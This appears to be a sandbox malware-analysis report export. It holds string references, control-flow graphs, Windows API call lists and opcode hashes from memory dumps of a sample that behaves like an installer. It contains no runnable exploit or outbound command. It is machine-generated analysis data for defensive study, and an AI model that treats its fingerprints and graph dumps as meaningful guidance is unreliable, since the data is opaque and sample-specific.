                                                            • Installing into GAC, xrefs: 004719A2
                                                            • Version of existing file: (none), xrefs: 00470FA2
                                                            • @, xrefs: 00470A58
                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 004711A2
                                                            • Same time stamp. Skipping., xrefs: 00470FFD
                                                            • , xrefs: 00470E77, 00471048, 004710C6
                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 004710F5
                                                            • Dest filename: %s, xrefs: 00470B3C
                                                            • Incrementing shared file count (32-bit)., xrefs: 00471833
                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470F78
                                                            • Time stamp of existing file: %s, xrefs: 00470CD3
                                                            • Same version. Skipping., xrefs: 00470F8D
                                                            • Stripped read-only attribute., xrefs: 0047116F
                                                            • Incrementing shared file count (64-bit)., xrefs: 0047181A
                                                            • Couldn't read time stamp. Skipping., xrefs: 00470FDD
                                                            • Version of our file: %u.%u.%u.%u, xrefs: 00470D98
                                                            • Installing the file., xrefs: 004711B1
                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 00470C76
                                                            • Will register the file (a type library) later., xrefs: 004717A1
                                                            • InUn, xrefs: 004713ED
                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470F6C
                                                            • Will register the file (a DLL/OCX) later., xrefs: 004717AD
                                                            • Non-default bitness: 32-bit, xrefs: 00470B63
                                                            • Existing file has a later time stamp. Skipping., xrefs: 00471077
                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470F5D
                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 00470E24
                                                            • Existing file is a newer version. Skipping., xrefs: 00470EAA
                                                            • Non-default bitness: 64-bit, xrefs: 00470B57
                                                            • Time stamp of existing file: (failed to read), xrefs: 00470CDF
                                                            • Version of our file: (none), xrefs: 00470DA4
                                                            • Failed to strip read-only attribute., xrefs: 0047117B
                                                            • Uninstaller requires administrator: %s, xrefs: 0047141D
                                                            • -- File entry --, xrefs: 004709A3
                                                            • Time stamp of our file: %s, xrefs: 00470C43
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                            • API String ID: 0-4021121268
                                                            • Opcode ID: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                            • Instruction ID: 00dcbbebc37e67597ddb11db3b00c056d98a3663d13b65a1c96947d1bb872b77
                                                            • Opcode Fuzzy Hash: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                            • Instruction Fuzzy Hash: 2C927534A04288DFDB11DFA9C845BDDBBB5AF05304F5480ABE848AB392C7789E45CB59

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1546 42e0ac-42e0bd 1547 42e0c8-42e0ed AllocateAndInitializeSid 1546->1547 1548 42e0bf-42e0c3 1546->1548 1549 42e297-42e29f 1547->1549 1550 42e0f3-42e110 GetVersion 1547->1550 1548->1549 1551 42e112-42e127 GetModuleHandleA GetProcAddress 1550->1551 1552 42e129-42e12b 1550->1552 1551->1552 1553 42e152-42e16c GetCurrentThread OpenThreadToken 1552->1553 1554 42e12d-42e13b CheckTokenMembership 1552->1554 1557 42e1a3-42e1cb GetTokenInformation 1553->1557 1558 42e16e-42e178 GetLastError 1553->1558 1555 42e141-42e14d 1554->1555 1556 42e279-42e28f FreeSid 1554->1556 1555->1556 1559 42e1e6-42e20a call 402648 GetTokenInformation 1557->1559 1560 42e1cd-42e1d5 GetLastError 1557->1560 1561 42e184-42e197 GetCurrentProcess OpenProcessToken 1558->1561 1562 42e17a-42e17f call 4031bc 1558->1562 1573 42e218-42e220 1559->1573 1574 42e20c-42e216 call 4031bc * 2 1559->1574 1560->1559 1564 42e1d7-42e1e1 call 4031bc * 2 1560->1564 1561->1557 1563 42e199-42e19e call 4031bc 1561->1563 1562->1549 1563->1549 1564->1549 1576 42e222-42e223 1573->1576 1577 42e253-42e271 call 402660 CloseHandle 1573->1577 1574->1549 1580 42e225-42e238 EqualSid 1576->1580 1584 42e23a-42e247 1580->1584 1585 42e24f-42e251 1580->1585 1584->1585 1588 42e249-42e24d 1584->1588 1585->1577 1585->1580 1588->1577
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                            • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                            • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                            • API String ID: 2252812187-1888249752
                                                            • Opcode ID: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                            • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                            • Opcode Fuzzy Hash: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                            • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1610 4502ac-4502b9 1611 4502bf-4502cc GetVersion 1610->1611 1612 450368-450372 1610->1612 1611->1612 1613 4502d2-4502e8 LoadLibraryA 1611->1613 1613->1612 1614 4502ea-450363 GetProcAddress * 6 1613->1614 1614->1612
                                                            APIs
                                                            • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                            • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                            • GetProcAddress.KERNEL32(6FE40000,RmStartSession), ref: 004502F5
                                                            • GetProcAddress.KERNEL32(6FE40000,RmRegisterResources), ref: 0045030A
                                                            • GetProcAddress.KERNEL32(6FE40000,RmGetList), ref: 0045031F
                                                            • GetProcAddress.KERNEL32(6FE40000,RmShutdown), ref: 00450334
                                                            • GetProcAddress.KERNEL32(6FE40000,RmRestart), ref: 00450349
                                                            • GetProcAddress.KERNEL32(6FE40000,RmEndSession), ref: 0045035E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoadVersion
                                                            • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                            • API String ID: 1968650500-3419246398
                                                            • Opcode ID: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                            • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                            • Opcode Fuzzy Hash: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                            • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1674 423c1c-423c50 1675 423c52-423c53 1674->1675 1676 423c84-423c9b call 423b78 1674->1676 1678 423c55-423c71 call 40b44c 1675->1678 1681 423cfc-423d01 1676->1681 1682 423c9d 1676->1682 1699 423c73-423c7b 1678->1699 1700 423c80-423c82 1678->1700 1684 423d03 1681->1684 1685 423d37-423d3c 1681->1685 1686 423ca3-423ca6 1682->1686 1687 423d60-423d70 1682->1687 1688 423fc1-423fc9 1684->1688 1689 423d09-423d11 1684->1689 1692 423d42-423d45 1685->1692 1693 4240aa-4240b8 IsIconic 1685->1693 1690 423cd5-423cd8 1686->1690 1691 423ca8 1686->1691 1694 423d72-423d77 1687->1694 1695 423d7b-423d83 call 4241a4 1687->1695 1704 424162-42416a 1688->1704 1710 423fcf-423fda call 4181f0 1688->1710 1702 423f23-423f4a SendMessageA 1689->1702 1703 423d17-423d1c 1689->1703 1711 423db9-423dc0 1690->1711 1712 423cde-423cdf 1690->1712 1706 423e06-423e16 call 423b94 1691->1706 1707 423cae-423cb1 1691->1707 1708 4240e6-4240fb call 424860 1692->1708 1709 423d4b-423d4c 1692->1709 1693->1704 1705 4240be-4240c9 GetFocus 1693->1705 1697 423d88-423d90 call 4241ec 1694->1697 1698 423d79-423d9c call 423b94 1694->1698 1695->1704 1697->1704 1698->1704 1714 424181-424187 1699->1714 1700->1676 1700->1678 1702->1704 1725 423d22-423d23 1703->1725 1726 42405a-424065 1703->1726 1704->1714 1705->1704 1717 4240cf-4240d8 call 41f004 1705->1717 1706->1704 1718 423cb7-423cba 1707->1718 1719 423e2e-423e4a PostMessageA call 423b94 1707->1719 1708->1704 1728 423d52-423d55 1709->1728 1729 4240fd-424104 1709->1729 1710->1704 1761 423fe0-423fef call 4181f0 IsWindowEnabled 1710->1761 1711->1704 1722 423dc6-423dcd 1711->1722 1723 423ce5-423ce8 1712->1723 1724 423f4f-423f56 1712->1724 1717->1704 1773 4240de-4240e4 SetFocus 1717->1773 1735 423cc0-423cc3 1718->1735 1736 423eb5-423ebc 1718->1736 1719->1704 1722->1704 1741 423dd3-423dd9 1722->1741 1742 423cee-423cf1 1723->1742 1743 423e4f-423e6f call 423b94 1723->1743 1724->1704 1731 423f5c-423f61 call 404e54 1724->1731 1744 424082-42408d 1725->1744 1745 423d29-423d2c 1725->1745 1726->1704 1747 42406b-42407d 1726->1747 1748 424130-424137 1728->1748 1749 423d5b 1728->1749 1738 424106-424119 call 4244e4 1729->1738 1739 42411b-42412e call 42453c 1729->1739 1731->1704 1756 423cc9-423cca 1735->1756 1757 423dde-423dec IsIconic 1735->1757 1758 423ebe-423ed1 call 423b24 1736->1758 1759 423eef-423f00 call 423b94 1736->1759 1738->1704 1739->1704 1741->1704 1762 423cf7 1742->1762 1763 423e1b-423e29 call 424188 1742->1763 1788 423e93-423eb0 call 423a94 PostMessageA 1743->1788 1789 423e71-423e8e call 423b24 PostMessageA 1743->1789 1744->1704 1750 424093-4240a5 1744->1750 1767 423d32 1745->1767 1768 423f66-423f6e 1745->1768 1747->1704 1765 42414a-424159 1748->1765 1766 424139-424148 1748->1766 1769 42415b-42415c call 423b94 1749->1769 1750->1704 1774 423cd0 1756->1774 1775 423da1-423da9 1756->1775 1781 423dfa-423e01 call 423b94 1757->1781 1782 423dee-423df5 call 423bd0 1757->1782 1803 423ee3-423eea call 423b94 1758->1803 1804 423ed3-423edd call 41ef68 1758->1804 1808 423f02-423f08 call 41eeb4 1759->1808 1809 423f16-423f1e call 423a94 1759->1809 1761->1704 1805 423ff5-424004 call 4181f0 IsWindowVisible 1761->1805 1762->1769 1763->1704 1765->1704 1766->1704 1767->1769 1768->1704 1772 423f74-423f7b 1768->1772 1797 424161 1769->1797 1772->1704 1790 423f81-423f90 call 4181f0 IsWindowEnabled 1772->1790 1773->1704 1774->1769 1775->1704 1791 423daf-423db4 call 422c5c 1775->1791 1781->1704 1782->1704 1788->1704 1789->1704 1790->1704 1819 423f96-423fac call 412320 1790->1819 1791->1704 1797->1704 1803->1704 1804->1803 1805->1704 1826 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1805->1826 1823 423f0d-423f10 1808->1823 1809->1704 1819->1704 1829 423fb2-423fbc 1819->1829 1823->1809 1826->1704 1829->1704
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                            • Instruction ID: adb1057a9d0d7329e5210459a6b6756db00cf693e958207d3a560887342e2c6b
                                                            • Opcode Fuzzy Hash: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                            • Instruction Fuzzy Hash: EBE1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE81DB08

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1989 467710-467726 1990 467730-4677e7 call 49514c call 402b30 * 6 1989->1990 1991 467728-46772b call 402d30 1989->1991 2008 467824-46783d 1990->2008 2009 4677e9-467810 call 41464c 1990->2009 1991->1990 2015 46783f-467866 call 41462c 2008->2015 2016 46787a-467888 call 495454 2008->2016 2013 467815-46781f call 41460c 2009->2013 2014 467812 2009->2014 2013->2008 2014->2013 2022 46786b-467875 call 4145ec 2015->2022 2023 467868 2015->2023 2024 46788a-467899 call 49529c 2016->2024 2025 46789b-46789d call 4953c0 2016->2025 2022->2016 2023->2022 2030 4678a2-4678f5 call 494db0 call 41a3e0 * 2 2024->2030 2025->2030 2037 467906-46791b call 451444 call 414b28 2030->2037 2038 4678f7-467904 call 414b28 2030->2038 2043 467920-467927 2037->2043 2038->2043 2045 46796f-467df5 call 4951ec call 495510 call 41462c * 3 call 4146cc call 4145ec * 3 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f80 call 460fd4 LoadBitmapA call 41d6c0 call 460fa4 call 460fbc call 4674ec call 469000 call 466b6c call 40357c call 414b28 call 466ea4 call 466eac call 466b6c call 40357c * 2 call 414b28 call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 414b28 * 2 call 469000 call 414b28 * 2 call 466ea4 call 41460c call 466ea4 call 41460c call 469000 call 414b28 call 466ea4 call 466eac call 469000 call 414b28 call 466ea4 call 41460c * 2 call 414b28 call 466ea4 call 41460c 2043->2045 2046 467929-46796a call 4146cc call 414710 call 420fa8 call 420fd4 call 420b78 call 420ba4 2043->2046 2176 467df7-467e4f call 41460c call 414b28 call 466ea4 call 41460c 2045->2176 2177 467e51-467e6a call 414a54 * 2 2045->2177 2046->2045 2185 467e6f-467f20 call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2176->2185 2177->2185 2203 467f22-467f3d 2185->2203 2204 467f5a-468190 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 4181f0 call 42ed48 call 414b28 call 4951ec call 495510 call 41462c call 466b6c call 414b28 call 466ea4 call 41460c call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 41460c call 466eac call 466b6c call 414b28 call 466ea4 2185->2204 2205 467f42-467f55 call 41460c 2203->2205 2206 467f3f 2203->2206 2265 468192-46819b 2204->2265 2266 4681d1-46828a call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2204->2266 2205->2204 2206->2205 2265->2266 2267 46819d-4681cc call 414a54 call 466eac 2265->2267 2284 4682c4-4686e5 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 414b28 call 4951ec call 495510 call 41462c call 414b28 call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 42bbe0 call 495520 call 44e8c0 call 466b6c call 469000 call 466b6c call 469000 call 466b6c call 469000 * 2 call 414b28 call 466ea4 call 466eac call 469000 call 494db0 call 41a3e0 call 466b6c call 40357c call 414b28 call 466ea4 call 41460c call 414b28 * 2 call 495520 call 403494 call 40357c * 2 call 414b28 2266->2284 2285 46828c-4682a7 2266->2285 2267->2266 2384 4686e7-468704 call 44ffc8 call 450124 2284->2384 2385 468709-468710 2284->2385 2287 4682ac-4682bf call 41460c 2285->2287 2288 4682a9 2285->2288 2287->2284 2288->2287 2384->2385 2387 468734-46873b 2385->2387 2388 468712-46872f call 44ffc8 call 450124 2385->2388 2391 46875f-4687a5 call 4181f0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4690f4 2387->2391 2392 46873d-46875a call 44ffc8 call 450124 2387->2392 2388->2387 2405 4687a7-4687ae 2391->2405 2406 4687bf 2391->2406 2392->2391 2407 4687b0-4687b9 2405->2407 2408 4687bb-4687bd 2405->2408 2409 4687c1-4687d0 2406->2409 2407->2406 2407->2408 2408->2409 2410 4687d2-4687d9 2409->2410 2411 4687ea 2409->2411 2413 4687e6-4687e8 2410->2413 2414 4687db-4687e4 2410->2414 2412 4687ec-468806 2411->2412 2415 4688af-4688b6 2412->2415 2416 46880c-468815 2412->2416 2413->2412 2414->2411 2414->2413 2419 4688bc-4688df call 47bfd8 call 403450 2415->2419 2420 468949-468957 call 414b28 2415->2420 2417 468817-46886e call 47bfd8 call 414b28 call 47bfd8 call 414b28 call 47bfd8 call 414b28 2416->2417 2418 468870-4688aa call 414b28 * 3 2416->2418 2417->2415 2418->2415 2443 4688f0-468904 call 403494 2419->2443 2444 4688e1-4688ee call 47c178 2419->2444 2428 46895c-468965 2420->2428 2432 468a75-468aa4 call 42b97c call 44e84c 2428->2432 2433 46896b-468983 call 429fe8 2428->2433 2462 468b52-468b56 2432->2462 2463 468aaa-468aae 2432->2463 2445 468985-468989 2433->2445 2446 4689fa-4689fe 2433->2446 2458 468916-468947 call 42c814 call 42cbd0 call 403494 call 414b28 2443->2458 2459 468906-468911 call 403494 2443->2459 2444->2458 2454 46898b-4689c5 call 40b44c call 47bfd8 2445->2454 2452 468a00-468a09 2446->2452 2453 468a4e-468a52 2446->2453 2452->2453 2460 468a0b-468a16 2452->2460 2465 468a66-468a70 call 42a06c 2453->2465 2466 468a54-468a64 call 42a06c 2453->2466 2519 4689c7-4689ce 2454->2519 2520 4689f4-4689f8 2454->2520 2458->2428 2459->2458 2460->2453 2470 468a18-468a1c 2460->2470 2473 468bd5-468bd9 2462->2473 2474 468b58-468b5f 2462->2474 2472 468ab0-468ac2 call 40b44c 2463->2472 2465->2432 2466->2432 2478 468a1e-468a41 call 40b44c call 406acc 2470->2478 2497 468af4-468b2b call 47bfd8 call 44cb1c 2472->2497 2498 468ac4-468af2 call 47bfd8 call 44cbec 2472->2498 2481 468c42-468c4b 2473->2481 2482 468bdb-468bf2 call 40b44c 2473->2482 2474->2473 2483 468b61-468b68 2474->2483 2529 468a43-468a46 2478->2529 2530 468a48-468a4c 2478->2530 2490 468c4d-468c65 call 40b44c call 469d68 2481->2490 2491 468c6a-468c7f call 46724c call 466fc8 2481->2491 2511 468bf4-468c30 call 40b44c call 469d68 * 2 call 469c08 2482->2511 2512 468c32-468c40 call 469d68 2482->2512 2483->2473 2493 468b6a-468b75 2483->2493 2490->2491 2538 468cd1-468cdb call 414a54 2491->2538 2539 468c81-468ca4 call 42a050 call 40b44c 2491->2539 2493->2491 2501 468b7b-468b7f 2493->2501 2540 468b30-468b34 2497->2540 2498->2540 2513 468b81-468b97 call 40b44c 2501->2513 2511->2491 2512->2491 2536 468bca-468bce 2513->2536 2537 468b99-468bc5 call 42a06c call 469d68 call 469c08 2513->2537 2519->2520 2531 4689d0-4689e2 call 406acc 2519->2531 2520->2446 2520->2454 2529->2453 2530->2453 2530->2478 2531->2520 2557 4689e4-4689ee 2531->2557 2536->2513 2550 468bd0 2536->2550 2537->2491 2552 468ce0-468cff call 414a54 2538->2552 2571 468ca6-468cad 2539->2571 2572 468caf-468cbe call 414a54 2539->2572 2548 468b36-468b3d 2540->2548 2549 468b3f-468b41 2540->2549 2548->2549 2556 468b48-468b4c 2548->2556 2549->2556 2550->2491 2567 468d01-468d24 call 42a050 call 469ec8 2552->2567 2568 468d29-468d4c call 47bfd8 call 403450 2552->2568 2556->2462 2556->2472 2557->2520 2562 4689f0 2557->2562 2562->2520 2567->2568 2586 468d4e-468d57 2568->2586 2587 468d68-468d71 2568->2587 2571->2572 2576 468cc0-468ccf call 414a54 2571->2576 2572->2552 2576->2552 2586->2587 2590 468d59-468d66 call 47c178 2586->2590 2588 468d87-468d97 call 403494 2587->2588 2589 468d73-468d85 call 403684 2587->2589 2597 468da9-468dc0 call 414b28 2588->2597 2589->2588 2598 468d99-468da4 call 403494 2589->2598 2590->2597 2602 468df6-468e00 call 414a54 2597->2602 2603 468dc2-468dc9 2597->2603 2598->2597 2608 468e05-468e2a call 403400 * 3 2602->2608 2605 468dd6-468de0 call 42b0f4 2603->2605 2606 468dcb-468dd4 2603->2606 2609 468de5-468df4 call 414a54 2605->2609 2606->2605 2606->2609 2609->2608
                                                            APIs
                                                              • Part of subcall function 0049529C: GetWindowRect.USER32(00000000), ref: 004952B2
                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467ADF
                                                              • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467AF9), ref: 0041D6EB
                                                              • Part of subcall function 004674EC: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                              • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                              • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                              • Part of subcall function 00466EAC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                              • Part of subcall function 00495520: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0049552A
                                                              • Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                              • Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                              • Part of subcall function 004951EC: 73E9A570.USER32(00000000,?,?,?), ref: 0049520E
                                                              • Part of subcall function 004951EC: SelectObject.GDI32(?,00000000), ref: 00495234
                                                              • Part of subcall function 004951EC: 73E9A480.USER32(00000000,?,00495292,0049528B,?,00000000,?,?,?), ref: 00495285
                                                              • Part of subcall function 00495510: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0049551A
                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02189D50,0218B93C,?,?,0218B96C,?,?,0218B9BC,?), ref: 00468769
                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046877A
                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468792
                                                              • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                            • String ID: $(Default)$STOPIMAGE$k H
                                                            • API String ID: 3271511185-4041106330
                                                            • Opcode ID: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                            • Instruction ID: 2b4e5e33b1fbe28ecfb2af168a793b611adbc31a6fcb8730d9662ddd01b2079a
                                                            • Opcode Fuzzy Hash: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                            • Instruction Fuzzy Hash: 6CF2C7386005208FCB00EB59D9D9F9973F5BF49304F1582BAF5049B36ADB74AC46CB9A
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
